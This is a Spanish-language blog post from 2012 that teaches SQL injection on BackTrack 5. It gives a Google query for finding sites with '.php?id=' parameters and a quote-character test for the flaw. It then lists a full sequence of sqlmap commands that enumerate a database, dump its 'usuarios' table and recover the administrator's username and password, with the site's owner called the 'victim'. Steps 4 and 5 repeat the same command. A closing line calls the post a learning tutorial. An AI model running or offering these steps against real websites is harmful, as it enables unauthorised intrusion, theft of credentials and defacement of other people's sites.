IncreInfo

jueves, 1 de marzo de 2012

Inyeccion SQL con BackTrack 5 (Hackear paginas web)

Buenos amigos muchos personas se han preguntado los métodos que utiliza un cracker para atacar una pagina web y a su vez hacer un defacement, aqui una breve explicación de como encontrar los tipos de vulnerabilidades que utilizan los cracker para hackear una web, empecemos.

Ingresamos a nuestro navegador y entramos a www.google.com  y escribimos lo siguiente:
.php?id=

una vez encontrados los sitios que terminan www.dominio.com/ejemplo.php?id=2 empezamos a buscar la vulnerabilidad de la pagina www.dominio.com/ejemplo.php?id=2' solo agregamos el signo al final de la url  ' y esta nos mostrara un error en la web asi como nos muestra la imagen 




Ahora empezamos con nuestro ataque.  entramos en nuestro Backtarck en:  Applications/BackTrack>Exploitation Tools>Web Exploitation Tools>sqlmap


ya abierta nuestra ventana empezamos a escribir lo siguiente: 
1:
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 --dbs


ya hecho esto nos arrojara las siguientes tablas así como se muestra en la imagen inferior 
2:
Una vez que nos dio esos datos escogemos la ultima para seguir sacando datos de la pagina y escribimos lo siguiente:
 python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db --tables

3:
Ya ingresando nos volverá a dar mas datos.
Ya que nuestro objetivo es sacar la el pass y el nombre de usuario de nuestra pagina escogemos la tabla "usuarios" y escribimos lo siguiente 
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios --columns


4:
Una vez obtenido os datos de "usuarios" escribimos lo siguiente:
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C usuario --dump

5:
Bingo nos dio las tablas de usuario y password, entonces seguimos sacando datos de nuestra victima 
 python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C usuario --dump


Perfecto =D nos dio el nombre del administrador de la pagina que es "admin" 

6: 
ahora solo nos falta es sacar el password del administrador y para eso escribimos lo siguiente asi como nos muestra la imagen de abajo
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C password --dump



Y BINGO..!!! nos dio el password de la pagina que es "desarrollo" xD xD xD xD....
recuerden este es un tutorial de aprendizaje sobre como saber lo vulnerable que son las paginas web y ver sus fallos, no me responsabilizo sobre el mal uso que le lleguen a dar